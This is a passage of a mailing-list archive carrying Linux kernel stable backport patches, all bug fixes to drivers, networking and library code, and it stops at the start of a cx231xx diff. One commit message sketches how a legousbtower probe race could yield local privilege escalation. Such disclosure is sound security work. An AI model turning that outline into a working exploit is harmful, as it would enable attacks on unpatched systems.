Signed-off-by: Dan Carpenter <***@oracle.com>
Signed-off-by: Mauro Carvalho Chehab <***@osg.samsung.com>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
drivers/media/usb/em28xx/em28xx-i2c.c | 5 ++---
1 file changed, 2 insertions(+), 3 deletions(-)

diff --git a/drivers/media/usb/em28xx/em28xx-i2c.c b/drivers/media/usb/em28xx/em28xx-i2c.c
index c4ff973..d28d906 100644
--- a/drivers/media/usb/em28xx/em28xx-i2c.c
+++ b/drivers/media/usb/em28xx/em28xx-i2c.c
@@ -469,9 +469,8 @@ static int em28xx_i2c_xfer(struct i2c_adapter *i2c_adap,
int addr, rc, i;
u8 reg;

- rc = rt_mutex_trylock(&dev->i2c_bus_lock);
- if (rc < 0)
- return rc;
+ if (!rt_mutex_trylock(&dev->i2c_bus_lock))
+ return -EAGAIN;

/* Switch I2C bus if needed */
if (bus != dev->cur_i2c_bus &&
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:30:02 UTC
Permalink
From: Steffen Maier <***@linux.vnet.ibm.com>

commit 94db3725f049ead24c96226df4a4fb375b880a77 upstream.

commit 2c55b750a884b86dea8b4cc5f15e1484cc47a25c
("[SCSI] zfcp: Redesign of the debug tracing for SAN records.")
started to add FC_CT_HDR_LEN which made zfcp dump random data
out of bounds for RSPN GS responses because u.rspn.rsp
is the largest and last field in the union of struct zfcp_fc_req.
Other request/response types only happened to stay within bounds
due to the padding of the union or
due to the trace capping of u.gspn.rsp to ZFCP_DBF_SAN_MAX_PAYLOAD.

Timestamp : ...
Area : SAN
Subarea : 00
Level : 1
Exception : -
CPU id : ..
Caller : ...
Record id : 2
Tag : fsscth2
Request id : 0x...
Destination ID : 0x00fffffc
Payload short : 01000000 fc020000 80020000 00000000
xxxxxxxx xxxxxxxx xxxxxxxx xxxxxxxx <===
00000000 00000000 00000000 00000000
Payload length : 32 <===

struct zfcp_fc_req {
[0] struct zfcp_fsf_ct_els ct_els;
[56] struct scatterlist sg_req;
[96] struct scatterlist sg_rsp;
union {
struct {req; rsp;} adisc; SIZE: 28+28= 56
struct {req; rsp;} gid_pn; SIZE: 24+20= 44
struct {rspsg; req;} gpn_ft; SIZE: 40*4+20=180
struct {req; rsp;} gspn; SIZE: 20+273= 293
struct {req; rsp;} rspn; SIZE: 277+16= 293
[136] } u;
}
SIZE: 432

Signed-off-by: Steffen Maier <***@linux.vnet.ibm.com>
Fixes: 2c55b750a884 ("[SCSI] zfcp: Redesign of the debug tracing for SAN records.")
Reviewed-by: Alexey Ishchuk <***@linux.vnet.ibm.com>
Reviewed-by: Benjamin Block <***@linux.vnet.ibm.com>
Reviewed-by: Hannes Reinecke <***@suse.com>
Signed-off-by: Martin K. Petersen <***@oracle.com>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
drivers/s390/scsi/zfcp_dbf.c | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/drivers/s390/scsi/zfcp_dbf.c b/drivers/s390/scsi/zfcp_dbf.c
index a940602..90ffe7b 100644
--- a/drivers/s390/scsi/zfcp_dbf.c
+++ b/drivers/s390/scsi/zfcp_dbf.c
@@ -382,7 +382,7 @@ void zfcp_dbf_san_req(char *tag, struct zfcp_fsf_req *fsf, u32 d_id)
struct zfcp_fsf_ct_els *ct_els = fsf->data;
u16 length;

- length = (u16)(ct_els->req->length + FC_CT_HDR_LEN);
+ length = (u16)(ct_els->req->length);
zfcp_dbf_san(tag, dbf, sg_virt(ct_els->req), ZFCP_DBF_SAN_REQ, length,
fsf->req_id, d_id);
}
@@ -398,7 +398,7 @@ void zfcp_dbf_san_res(char *tag, struct zfcp_fsf_req *fsf)
struct zfcp_fsf_ct_els *ct_els = fsf->data;
u16 length;

- length = (u16)(ct_els->resp->length + FC_CT_HDR_LEN);
+ length = (u16)(ct_els->resp->length);
zfcp_dbf_san(tag, dbf, sg_virt(ct_els->resp), ZFCP_DBF_SAN_RES, length,
fsf->req_id, ct_els->d_id);
}
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:30:02 UTC
Permalink
From: Greg Kroah-Hartman <***@linuxfoundation.org>

commit 2fae9e5a7babada041e2e161699ade2447a01989 upstream.

This patch fixes a NULL pointer dereference caused by a race codition in
the probe function of the legousbtower driver. It re-structures the
probe function to only register the interface after successfully reading
the board's firmware ID.

The probe function does not deregister the usb interface after an error
receiving the devices firmware ID. The device file registered
(/dev/usb/legousbtower%d) may be read/written globally before the probe
function returns. When tower_delete is called in the probe function
(after an r/w has been initiated), core dev structures are deleted while
the file operation functions are still running. If the 0 address is
mappable on the machine, this vulnerability can be used to create a
Local Priviege Escalation exploit via a write-what-where condition by
remapping dev->interrupt_out_buffer in tower_write. A forged USB device
and local program execution would be required for LPE. The USB device
would have to delay the control message in tower_probe and accept
the control urb in tower_open whilst guest code initiated a write to the
device file as tower_delete is called from the error in tower_probe.

This bug has existed since 2003. Patch tested by emulated device.

Reported-by: James Patrick-Evans <***@jmp-e.com>
Tested-by: James Patrick-Evans <***@jmp-e.com>
Signed-off-by: James Patrick-Evans <***@jmp-e.com>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
drivers/usb/misc/legousbtower.c | 35 +++++++++++++++++------------------
1 file changed, 17 insertions(+), 18 deletions(-)

diff --git a/drivers/usb/misc/legousbtower.c b/drivers/usb/misc/legousbtower.c
index 8089479..c3e9cfc 100644
--- a/drivers/usb/misc/legousbtower.c
+++ b/drivers/usb/misc/legousbtower.c
@@ -953,24 +953,6 @@ static int tower_probe (struct usb_interface *interface, const struct usb_device
dev->interrupt_in_interval = interrupt_in_interval ? interrupt_in_interval : dev->interrupt_in_endpoint->bInterval;
dev->interrupt_out_interval = interrupt_out_interval ? interrupt_out_interval : dev->interrupt_out_endpoint->bInterval;

- /* we can register the device now, as it is ready */
- usb_set_intfdata (interface, dev);
-
- retval = usb_register_dev (interface, &tower_class);
-
- if (retval) {
- /* something prevented us from registering this driver */
- dev_err(idev, "Not able to get a minor for this device.\n");
- usb_set_intfdata (interface, NULL);
- goto error;
- }
- dev->minor = interface->minor;
-
- /* let the user know what node this device is now attached to */
- dev_info(&interface->dev, "LEGO USB Tower #%d now attached to major "
- "%d minor %d\n", (dev->minor - LEGO_USB_TOWER_MINOR_BASE),
- USB_MAJOR, dev->minor);
-
/* get the firmware version and log it */
result = usb_control_msg (udev,
usb_rcvctrlpipe(udev, 0),
@@ -991,6 +973,23 @@ static int tower_probe (struct usb_interface *interface, const struct usb_device
get_version_reply.minor,
le16_to_cpu(get_version_reply.build_no));

+ /* we can register the device now, as it is ready */
+ usb_set_intfdata (interface, dev);
+
+ retval = usb_register_dev (interface, &tower_class);
+
+ if (retval) {
+ /* something prevented us from registering this driver */
+ dev_err(idev, "Not able to get a minor for this device.\n");
+ usb_set_intfdata (interface, NULL);
+ goto error;
+ }
+ dev->minor = interface->minor;
+
+ /* let the user know what node this device is now attached to */
+ dev_info(&interface->dev, "LEGO USB Tower #%d now attached to major "
+ "%d minor %d\n", (dev->minor - LEGO_USB_TOWER_MINOR_BASE),
+ USB_MAJOR, dev->minor);

exit:
dbg(2, "%s: leave, return value 0x%.8lx (dev)", __func__, (long) dev);
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:30:02 UTC
Permalink
From: Eric Dumazet <***@google.com>

commit ac6e780070e30e4c35bd395acfe9191e6268bdd3 upstream.

With syzkaller help, Marco Grassi found a bug in TCP stack,
crashing in tcp_collapse()

Root cause is that sk_filter() can truncate the incoming skb,
but TCP stack was not really expecting this to happen.
It probably was expecting a simple DROP or ACCEPT behavior.

We first need to make sure no part of TCP header could be removed.
Then we need to adjust TCP_SKB_CB(skb)->end_seq

Many thanks to syzkaller team and Marco for giving us a reproducer.

Signed-off-by: Eric Dumazet <***@google.com>
Reported-by: Marco Grassi <***@gmail.com>
Reported-by: Vladis Dronov <***@redhat.com>
Signed-off-by: David S. Miller <***@davemloft.net>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
include/linux/filter.h | 6 +++++-
include/net/tcp.h | 1 +
net/core/filter.c | 10 +++++-----
net/ipv4/tcp_ipv4.c | 19 ++++++++++++++++++-
net/ipv6/tcp_ipv6.c | 6 ++++--
5 files changed, 33 insertions(+), 9 deletions(-)

diff --git a/include/linux/filter.h b/include/linux/filter.h
index f65f5a6..c2bea01 100644
--- a/include/linux/filter.h
+++ b/include/linux/filter.h
@@ -36,7 +36,11 @@ static inline unsigned int sk_filter_len(const struct sk_filter *fp)
return fp->len * sizeof(struct sock_filter) + sizeof(*fp);
}

-extern int sk_filter(struct sock *sk, struct sk_buff *skb);
+int sk_filter_trim_cap(struct sock *sk, struct sk_buff *skb, unsigned int cap);
+static inline int sk_filter(struct sock *sk, struct sk_buff *skb)
+{
+ return sk_filter_trim_cap(sk, skb, 1);
+}
extern unsigned int sk_run_filter(const struct sk_buff *skb,
const struct sock_filter *filter);
extern int sk_unattached_filter_create(struct sk_filter **pfp,
diff --git a/include/net/tcp.h b/include/net/tcp.h
index 1c5e037..79cd118 100644
--- a/include/net/tcp.h
+++ b/include/net/tcp.h
@@ -1029,6 +1029,7 @@ static inline void tcp_prequeue_init(struct tcp_sock *tp)
}

extern bool tcp_prequeue(struct sock *sk, struct sk_buff *skb);
+int tcp_filter(struct sock *sk, struct sk_buff *skb);

#undef STATE_TRACE

diff --git a/net/core/filter.c b/net/core/filter.c
index c6c18d8..65f2a65 100644
--- a/net/core/filter.c
+++ b/net/core/filter.c
@@ -67,9 +67,10 @@ static inline void *load_pointer(const struct sk_buff *skb, int k,
}

/**
- * sk_filter - run a packet through a socket filter
+ * sk_filter_trim_cap - run a packet through a socket filter
* @sk: sock associated with &sk_buff
* @skb: buffer to filter
+ * @cap: limit on how short the eBPF program may trim the packet
*
* Run the filter code and then cut skb->data to correct size returned by
* sk_run_filter. If pkt_len is 0 we toss packet. If skb->len is smaller
@@ -78,7 +79,7 @@ static inline void *load_pointer(const struct sk_buff *skb, int k,
* be accepted or -EPERM if the packet should be tossed.
*
*/
-int sk_filter(struct sock *sk, struct sk_buff *skb)
+int sk_filter_trim_cap(struct sock *sk, struct sk_buff *skb, unsigned int cap)
{
int err;
struct sk_filter *filter;
@@ -99,14 +100,13 @@ int sk_filter(struct sock *sk, struct sk_buff *skb)
filter = rcu_dereference(sk->sk_filter);
if (filter) {
unsigned int pkt_len = SK_RUN_FILTER(filter, skb);
-
- err = pkt_len ? pskb_trim(skb, pkt_len) : -EPERM;
+ err = pkt_len ? pskb_trim(skb, max(cap, pkt_len)) : -EPERM;
}
rcu_read_unlock();

return err;
}
-EXPORT_SYMBOL(sk_filter);
+EXPORT_SYMBOL(sk_filter_trim_cap);

/**
* sk_run_filter - run a filter on a socket
diff --git a/net/ipv4/tcp_ipv4.c b/net/ipv4/tcp_ipv4.c
index 5401fbf..6504a08 100644
--- a/net/ipv4/tcp_ipv4.c
+++ b/net/ipv4/tcp_ipv4.c
@@ -1959,6 +1959,21 @@ bool tcp_prequeue(struct sock *sk, struct sk_buff *skb)
}
EXPORT_SYMBOL(tcp_prequeue);

+int tcp_filter(struct sock *sk, struct sk_buff *skb)
+{
+ struct tcphdr *th = (struct tcphdr *)skb->data;
+ unsigned int eaten = skb->len;
+ int err;
+
+ err = sk_filter_trim_cap(sk, skb, th->doff * 4);
+ if (!err) {
+ eaten -= skb->len;
+ TCP_SKB_CB(skb)->end_seq -= eaten;
+ }
+ return err;
+}
+EXPORT_SYMBOL(tcp_filter);
+
/*
* From tcp_input.c
*/
@@ -2021,8 +2036,10 @@ process:
goto discard_and_relse;
nf_reset(skb);

- if (sk_filter(sk, skb))
+ if (tcp_filter(sk, skb))
goto discard_and_relse;
+ th = (const struct tcphdr *)skb->data;
+ iph = ip_hdr(skb);

skb->dev = NULL;

diff --git a/net/ipv6/tcp_ipv6.c b/net/ipv6/tcp_ipv6.c
index d823738..70b10ed 100644
--- a/net/ipv6/tcp_ipv6.c
+++ b/net/ipv6/tcp_ipv6.c
@@ -1330,7 +1330,7 @@ static int tcp_v6_do_rcv(struct sock *sk, struct sk_buff *skb)
goto discard;
#endif

- if (sk_filter(sk, skb))
+ if (tcp_filter(sk, skb))
goto discard;

/*
@@ -1501,8 +1501,10 @@ process:
if (!xfrm6_policy_check(sk, XFRM_POLICY_IN, skb))
goto discard_and_relse;

- if (sk_filter(sk, skb))
+ if (tcp_filter(sk, skb))
goto discard_and_relse;
+ th = (const struct tcphdr *)skb->data;
+ hdr = ipv6_hdr(skb);

skb->dev = NULL;
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:30:02 UTC
Permalink
From: Steffen Maier <***@linux.vnet.ibm.com>

commit 771bf03537ddfa4a4dde62ef9dfbc82e4f77ab20 upstream.

With commit 2c55b750a884b86dea8b4cc5f15e1484cc47a25c
("[SCSI] zfcp: Redesign of the debug tracing for SAN records.")
we lost the N_Port-ID where an ELS response comes from.
With commit 7c7dc196814b9e1d5cc254dc579a5fa78ae524f7
("[SCSI] zfcp: Simplify handling of ct and els requests")
we lost the N_Port-ID where a CT response comes from.
It's especially useful if the request SAN trace record
with D_ID was already lost due to trace buffer wrap.

GS uses an open WKA port handle and ELS just a D_ID, and
only for ELS we could get D_ID from QTCB bottom via zfcp_fsf_req.
To cover both cases, add a new field to zfcp_fsf_ct_els
and fill it in on request to use in SAN response trace.
Strictly speaking the D_ID on SAN response is the FC frame's S_ID.
We don't need a field for the other end which is always us.

Signed-off-by: Steffen Maier <***@linux.vnet.ibm.com>
Fixes: 2c55b750a884 ("[SCSI] zfcp: Redesign of the debug tracing for SAN records.")
Fixes: 7c7dc196814b ("[SCSI] zfcp: Simplify handling of ct and els requests")
Reviewed-by: Benjamin Block <***@linux.vnet.ibm.com>
Reviewed-by: Hannes Reinecke <***@suse.com>
Signed-off-by: Martin K. Petersen <***@oracle.com>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
drivers/s390/scsi/zfcp_dbf.c | 2 +-
drivers/s390/scsi/zfcp_fsf.c | 2 ++
drivers/s390/scsi/zfcp_fsf.h | 4 +++-
3 files changed, 6 insertions(+), 2 deletions(-)

diff --git a/drivers/s390/scsi/zfcp_dbf.c b/drivers/s390/scsi/zfcp_dbf.c
index 1abe57d..a940602 100644
--- a/drivers/s390/scsi/zfcp_dbf.c
+++ b/drivers/s390/scsi/zfcp_dbf.c
@@ -400,7 +400,7 @@ void zfcp_dbf_san_res(char *tag, struct zfcp_fsf_req *fsf)

length = (u16)(ct_els->resp->length + FC_CT_HDR_LEN);
zfcp_dbf_san(tag, dbf, sg_virt(ct_els->resp), ZFCP_DBF_SAN_RES, length,
- fsf->req_id, 0);
+ fsf->req_id, ct_els->d_id);
}

/**
diff --git a/drivers/s390/scsi/zfcp_fsf.c b/drivers/s390/scsi/zfcp_fsf.c
index 8898139..f246097 100644
--- a/drivers/s390/scsi/zfcp_fsf.c
+++ b/drivers/s390/scsi/zfcp_fsf.c
@@ -1085,6 +1085,7 @@ int zfcp_fsf_send_ct(struct zfcp_fc_wka_port *wka_port,

req->handler = zfcp_fsf_send_ct_handler;
req->qtcb->header.port_handle = wka_port->handle;
+ ct->d_id = wka_port->d_id;
req->data = ct;

zfcp_dbf_san_req("fssct_1", req, wka_port->d_id);
@@ -1188,6 +1189,7 @@ int zfcp_fsf_send_els(struct zfcp_adapter *adapter, u32 d_id,

hton24(req->qtcb->bottom.support.d_id, d_id);
req->handler = zfcp_fsf_send_els_handler;
+ els->d_id = d_id;
req->data = els;

zfcp_dbf_san_req("fssels1", req, d_id);
diff --git a/drivers/s390/scsi/zfcp_fsf.h b/drivers/s390/scsi/zfcp_fsf.h
index 5e795b8..8cad41f 100644
--- a/drivers/s390/scsi/zfcp_fsf.h
+++ b/drivers/s390/scsi/zfcp_fsf.h
@@ -3,7 +3,7 @@
*
* Interface to the FSF support functions.
*
- * Copyright IBM Corp. 2002, 2010
+ * Copyright IBM Corp. 2002, 2015
*/

#ifndef FSF_H
@@ -462,6 +462,7 @@ struct zfcp_blk_drv_data {
* @handler_data: data passed to handler function
* @port: Optional pointer to port for zfcp internal ELS (only test link ADISC)
* @status: used to pass error status to calling function
+ * @d_id: Destination ID of either open WKA port for CT or of D_ID for ELS
*/
struct zfcp_fsf_ct_els {
struct scatterlist *req;
@@ -470,6 +471,7 @@ struct zfcp_fsf_ct_els {
void *handler_data;
struct zfcp_port *port;
int status;
+ u32 d_id;
};

#endif /* FSF_H */
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:30:03 UTC
Permalink
From: Jan Remmet <***@phytec.de>

commit 8f9165c981fed187bb483de84caf9adf835aefda upstream.

http://www.ti.com/lit/pdf/SWCZ010:
DCDC o/p voltage can go higher than programmed value

Impact:
VDDI, VDD2, and VIO output programmed voltage level can go higher than
expected or crash, when coming out of PFM to PWM mode or using DVFS.

Description:
When DCDC CLK SYNC bits are 11/01:
* VIO 3-MHz oscillator is the source clock of the digital core and input
clock of VDD1 and VDD2
* Turn-on of VDD1 and VDD2 HSD PFETis synchronized or at a constant
phase shift
* Current pulled though VCC1+VCC2 is Iload(VDD1) + Iload(VDD2)
* The 3 HSD PFET will be turned-on at the same time, causing the highest
possible switching noise on the application. This noise level depends
on the layout, the VBAT level, and the load current. The noise level
increases with improper layout.

When DCDC CLK SYNC bits are 00:
* VIO 3-MHz oscillator is the source clock of digital core
* VDD1 and VDD2 are running on their own 3-MHz oscillator
* Current pulled though VCC1+VCC2 average of Iload(VDD1) + Iload(VDD2)
* The switching noise of the 3 SMPS will be randomly spread over time,
causing lower overall switching noise.

Workaround:
Set DCDCCTRL_REG[1:0]= 00.

Signed-off-by: Jan Remmet <***@phytec.de>
Signed-off-by: Mark Brown <***@kernel.org>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
drivers/regulator/tps65910-regulator.c | 6 ++++++
1 file changed, 6 insertions(+)

diff --git a/drivers/regulator/tps65910-regulator.c b/drivers/regulator/tps65910-regulator.c
index 45c1644..1ed4145 100644
--- a/drivers/regulator/tps65910-regulator.c
+++ b/drivers/regulator/tps65910-regulator.c
@@ -1080,6 +1080,12 @@ static int tps65910_probe(struct platform_device *pdev)
pmic->num_regulators = ARRAY_SIZE(tps65910_regs);
pmic->ext_sleep_control = tps65910_ext_sleep_control;
info = tps65910_regs;
+ /* Work around silicon erratum SWCZ010: output programmed
+ * voltage level can go higher than expected or crash
+ * Workaround: use no synchronization of DCDC clocks
+ */
+ tps65910_reg_clear_bits(pmic->mfd, TPS65910_DCDCCTRL,
+ DCDCCTRL_DCDCCKSYNC_MASK);
break;
case TPS65911:
pmic->get_ctrl_reg = &tps65911_get_ctrl_register;
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:30:03 UTC
Permalink
From: Nishanth Menon <***@ti.com>

commit 61dc0a446e5d08f2de8a24b45f69a1e302bb1b1b upstream.

pm_runtime_get_sync does return a error value that must be checked for
error conditions, else, due to various reasons, the device maynot be
enabled and the system will crash due to lack of clock to the hardware
module.

Before:
12.562784] [00000000] *pgd=fe193835
12.562792] Internal error: : 1406 [#1] SMP ARM
[...]
12.562864] CPU: 1 PID: 241 Comm: modprobe Not tainted 4.7.0-rc4-next-20160624 #2
12.562867] Hardware name: Generic DRA74X (Flattened Device Tree)
12.562872] task: ed51f140 ti: ed44c000 task.ti: ed44c000
12.562886] PC is at omap4_rng_init+0x20/0x84 [omap_rng]
12.562899] LR is at set_current_rng+0xc0/0x154 [rng_core]
[...]

After the proper checks:
[ 94.366705] omap_rng 48090000.rng: _od_fail_runtime_resume: FIXME:
missing hwmod/omap_dev info
[ 94.375767] omap_rng 48090000.rng: Failed to runtime_get device -19
[ 94.382351] omap_rng 48090000.rng: initialization failed.

Fixes: 665d92fa85b5 ("hwrng: OMAP: convert to use runtime PM")
Cc: Paul Walmsley <***@pwsan.com>
Signed-off-by: Nishanth Menon <***@ti.com>
Signed-off-by: Herbert Xu <***@gondor.apana.org.au>
[wt: adjusted context for pre-3.12-rc1 kernels]

Signed-off-by: Willy Tarreau <***@1wt.eu>
---
drivers/char/hw_random/omap-rng.c | 16 ++++++++++++++--
1 file changed, 14 insertions(+), 2 deletions(-)

diff --git a/drivers/char/hw_random/omap-rng.c b/drivers/char/hw_random/omap-rng.c
index d2903e7..52aebbe 100644
--- a/drivers/char/hw_random/omap-rng.c
+++ b/drivers/char/hw_random/omap-rng.c
@@ -127,7 +127,12 @@ static int omap_rng_probe(struct platform_device *pdev)
dev_set_drvdata(&pdev->dev, priv);

pm_runtime_enable(&pdev->dev);
- pm_runtime_get_sync(&pdev->dev);
+ ret = pm_runtime_get_sync(&pdev->dev);
+ if (ret) {
+ dev_err(&pdev->dev, "Failed to runtime_get device: %d\n", ret);
+ pm_runtime_put_noidle(&pdev->dev);
+ goto err_ioremap;
+ }

ret = hwrng_register(&omap_rng_ops);
if (ret)
@@ -182,8 +187,15 @@ static int omap_rng_suspend(struct device *dev)
static int omap_rng_resume(struct device *dev)
{
struct omap_rng_private_data *priv = dev_get_drvdata(dev);
+ int ret;
+
+ ret = pm_runtime_get_sync(dev);
+ if (ret) {
+ dev_err(dev, "Failed to runtime_get device: %d\n", ret);
+ pm_runtime_put_noidle(dev);
+ return ret;
+ }

- pm_runtime_get_sync(dev);
omap_rng_write_reg(priv, RNG_MASK_REG, 0x1);

return 0;
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:30:03 UTC
Permalink
From: Felipe Balbi <***@linux.intel.com>

commit c7de573471832dff7d31f0c13b0f143d6f017799 upstream.

When using SG lists, we would end up setting
request->actual to:

num_mapped_sgs * (request->length - count)

Let's fix that up by incrementing request->actual
only once.

Reported-by: Brian E Rogers <***@intel.com>
Signed-off-by: Felipe Balbi <***@linux.intel.com>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
drivers/usb/dwc3/gadget.c | 19 +++++++++++--------
1 file changed, 11 insertions(+), 8 deletions(-)

diff --git a/drivers/usb/dwc3/gadget.c b/drivers/usb/dwc3/gadget.c
index 6e70c88..0dfee61 100644
--- a/drivers/usb/dwc3/gadget.c
+++ b/drivers/usb/dwc3/gadget.c
@@ -1802,14 +1802,6 @@ static int __dwc3_cleanup_done_trbs(struct dwc3 *dwc, struct dwc3_ep *dep,
s_pkt = 1;
}

- /*
- * We assume here we will always receive the entire data block
- * which we should receive. Meaning, if we program RX to
- * receive 4K but we receive only 2K, we assume that's all we
- * should receive and we simply bounce the request back to the
- * gadget driver for further processing.
- */
- req->request.actual += req->request.length - count;
if (s_pkt)
return 1;
if ((event->status & DEPEVT_STATUS_LST) &&
@@ -1829,6 +1821,7 @@ static int dwc3_cleanup_done_reqs(struct dwc3 *dwc, struct dwc3_ep *dep,
struct dwc3_trb *trb;
unsigned int slot;
unsigned int i;
+ int count = 0;
int ret;

do {
@@ -1845,6 +1838,8 @@ static int dwc3_cleanup_done_reqs(struct dwc3 *dwc, struct dwc3_ep *dep,
slot++;
slot %= DWC3_TRB_NUM;
trb = &dep->trb_pool[slot];
+ count += trb->size & DWC3_TRB_SIZE_MASK;
+

ret = __dwc3_cleanup_done_trbs(dwc, dep, req, trb,
event, status);
@@ -1852,6 +1847,14 @@ static int dwc3_cleanup_done_reqs(struct dwc3 *dwc, struct dwc3_ep *dep,
break;
}while (++i < req->request.num_mapped_sgs);

+ /*
+ * We assume here we will always receive the entire data block
+ * which we should receive. Meaning, if we program RX to
+ * receive 4K but we receive only 2K, we assume that's all we
+ * should receive and we simply bounce the request back to the
+ * gadget driver for further processing.
+ */
+ req->request.actual += req->request.length - count;
dwc3_gadget_giveback(dep, req, status);

if (ret)
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:30:03 UTC
Permalink
From: Eric Dumazet <***@google.com>

commit 4f2e4ad56a65f3b7d64c258e373cb71e8d2499f4 upstream.

Sending zero checksum is ok for TCP, but not for UDP.

UDPv6 receiver should by default drop a frame with a 0 checksum,
and UDPv4 would not verify the checksum and might accept a corrupted
packet.

Simply replace such checksum by 0xffff, regardless of transport.

This error was caught on SIT tunnels, but seems generic.

Signed-off-by: Eric Dumazet <***@google.com>
Cc: Maciej Żenczykowski <***@google.com>
Cc: Willem de Bruijn <***@google.com>
Acked-by: Maciej Żenczykowski <***@google.com>
Signed-off-by: David S. Miller <***@davemloft.net>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
net/core/dev.c | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/net/core/dev.c b/net/core/dev.c
index 408f6ee..6494918 100644
--- a/net/core/dev.c
+++ b/net/core/dev.c
@@ -2234,7 +2234,7 @@ int skb_checksum_help(struct sk_buff *skb)
goto out;
}

- *(__sum16 *)(skb->data + offset) = csum_fold(csum);
+ *(__sum16 *)(skb->data + offset) = csum_fold(csum) ?: CSUM_MANGLED_0;
out_set_summed:
skb->ip_summed = CHECKSUM_NONE;
out:
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:30:03 UTC
Permalink
From: Alexander Usyskin <***@intel.com>

commit 582ab27a063a506ccb55fc48afcc325342a2deba upstream.

NFC version reply size checked against only header size, not against
full message size. That may lead potentially to uninitialized memory access
in version data.

That leads to warnings when version data is accessed:
drivers/misc/mei/bus-fixup.c: warning: '*((void *)&ver+11)' may be used uninitialized in this function [-Wuninitialized]: => 212:2

Reported in
Build regressions/improvements in v4.9-rc3
https://lkml.org/lkml/2016/10/30/57

[js] the check is in 3.12 only once

Fixes: 59fcd7c63abf (mei: nfc: Initial nfc implementation)
Signed-off-by: Alexander Usyskin <***@intel.com>
Signed-off-by: Tomas Winkler <***@intel.com>
Signed-off-by: Jiri Slaby <***@suse.cz>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
drivers/misc/mei/nfc.c | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/drivers/misc/mei/nfc.c b/drivers/misc/mei/nfc.c
index 4b7ea3f..1f8f856 100644
--- a/drivers/misc/mei/nfc.c
+++ b/drivers/misc/mei/nfc.c
@@ -292,7 +292,7 @@ static int mei_nfc_if_version(struct mei_nfc_dev *ndev)
return -ENOMEM;

bytes_recv = __mei_cl_recv(cl, (u8 *)reply, if_version_length);
- if (bytes_recv < 0 || bytes_recv < sizeof(struct mei_nfc_reply)) {
+ if (bytes_recv < if_version_length) {
dev_err(&dev->pdev->dev, "Could not read IF version\n");
ret = -EIO;
goto err;
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:30:03 UTC
Permalink
From: Jaewon Kim <***@samsung.com>

commit c2594bc37f4464bc74f2c119eb3269a643400aa0 upstream.

rs->begin in ratelimit is set in two cases.
1) when rs->begin was not initialized
2) when rs->interval was passed

For case #2, current ratelimit sets the begin to 0. This incurrs
improper suppression. The begin value will be set in the next ratelimit
call by 1). Then the time interval check will be always false, and
rs->printed will not be initialized. Although enough time passed,
ratelimit may return 0 if rs->printed is not less than rs->burst. To
reset interval properly, begin should be jiffies rather than 0.

For an example code below:

static DEFINE_RATELIMIT_STATE(mylimit, 1, 1);
for (i = 1; i <= 10; i++) {
if (__ratelimit(&mylimit))
printk("ratelimit test count %d\n", i);
msleep(3000);
}

test result in the current code shows suppression even there is 3 seconds sleep.

[ 78.391148] ratelimit test count 1
[ 81.295988] ratelimit test count 2
[ 87.315981] ratelimit test count 4
[ 93.336267] ratelimit test count 6
[ 99.356031] ratelimit test count 8
[ 105.376367] ratelimit test count 10

Signed-off-by: Jaewon Kim <***@samsung.com>
Signed-off-by: Andrew Morton <***@linux-foundation.org>
Signed-off-by: Linus Torvalds <***@linux-foundation.org>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
lib/ratelimit.c | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/ratelimit.c b/lib/ratelimit.c
index 40e03ea..2c5de86 100644
--- a/lib/ratelimit.c
+++ b/lib/ratelimit.c
@@ -49,7 +49,7 @@ int ___ratelimit(struct ratelimit_state *rs, const char *func)
if (rs->missed)
printk(KERN_WARNING "%s: %d callbacks suppressed\n",
func, rs->missed);
- rs->begin = 0;
+ rs->begin = jiffies;
rs->printed = 0;
rs->missed = 0;
}
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:30:03 UTC
Permalink
From: Mauro Carvalho Chehab <***@osg.samsung.com>

commit 24b923f073ac37eb744f56a2c7f77107b8219ab2 upstream.

This device uses GPIOs: 28 to switch between analog and
digital modes: on digital mode, it should be set to 1.

The code that sets it on analog mode is OK, but it misses
the logic that sets it on digital mode.

Signed-off-by: Mauro Carvalho Chehab <***@s-opensource.com>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
drivers/media/usb/cx231xx/cx231xx-cards.c | 2 +-
drivers/media/usb/cx231xx/cx231xx-core.c | 3 ++-
2 files changed, 3 insertions(+), 2 deletions(-)

diff --git a/drivers/media/usb/cx231xx/cx231xx-cards.c b/drivers/media/usb/cx231xx/cx231xx-cards.c
index 13249e5..c13c323 100644
--- a/drivers/media/usb/cx231xx/cx231xx-cards.c
+++ b/drivers/media/usb/cx231xx/cx231xx-cards.c
@@ -452,7 +452,7 @@ struct cx231xx_board cx231xx_boards[] = {
.output_mode = OUT_MODE_VIP11,
.demod_xfer_mode = 0,
.ctl_pin_status_mask = 0xFFFFFFC4,
- .agc_analog_digital_select_gpio = 0x00, /* According with PV cxPolaris.inf file */
+ .agc_analog_digital_select_gpio = 0x1c,
.tuner_sif_gpio = -1,
.tuner_scl_gpio = -1,
.tuner_sda_gpio = -1,
diff --git a/drivers/media/usb/cx231xx/cx231xx-core.c b/drivers/media/usb/cx231xx/cx231xx-core.c
